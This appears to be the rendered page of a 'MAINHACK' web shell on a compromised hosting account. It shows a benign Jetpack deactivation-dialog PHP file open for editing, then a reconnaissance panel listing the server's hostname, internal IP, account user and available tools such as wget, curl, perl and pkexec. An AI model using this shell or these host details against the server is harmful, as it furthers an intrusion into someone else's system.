[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: deactivation-dialog.php
<?php /** * The deactivation modal content. * * @package automattic/jetpack * * phpcs:disable VariableAnalysis.CodeAnalysis.VariableAnalysis.UndefinedVariable * because $data is magically loaded by Jetpack::load_view() */ ?> <div id="jetpack_deactivation_dialog"> <div class="jetpack_deactivation_dialog_content"> <p> <?php echo esc_html( sprintf( /* translators: %d is the number of additional plugins using the jetpack connection. */ _n( 'The Jetpack Connection is also used by %d other plugin, and it will lose connection.', 'The Jetpack Connection is also used by %d other plugins, and they will lose connection.', count( $data ), 'jetpack' ), count( $data ) ) ); ?> </p> <ul> <?php foreach ( $data as $plugin_slug => $plugin_args ) : ?> <li> <span class="dashicons dashicons-warning"></span> <span> <?php echo esc_html( isset( $plugin_args['name'] ) ? $plugin_args['name'] : $plugin_slug ); ?> <span> </li> <?php endforeach; ?> </ul> </div> <div class="jetpack_deactivation_dialog_content__buttons-row-container"> <div class="jetpack_deactivation_dialog_content__buttons-row"> <p><?php esc_html_e( 'Are you sure you want to deactivate?', 'jetpack' ); ?></p> <div class="jetpack_deactivation_dialog_content__buttons"> <button type="button" id="jetpack_deactivation_dialog_content__button-cancel"><?php esc_html_e( 'Cancel', 'jetpack' ); ?></button> <button type="button" id="jetpack_deactivation_dialog_content__button-deactivate"><?php esc_html_e( 'Disconnect and Deactivate', 'jetpack' ); ?></button> </div> </div> </div> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129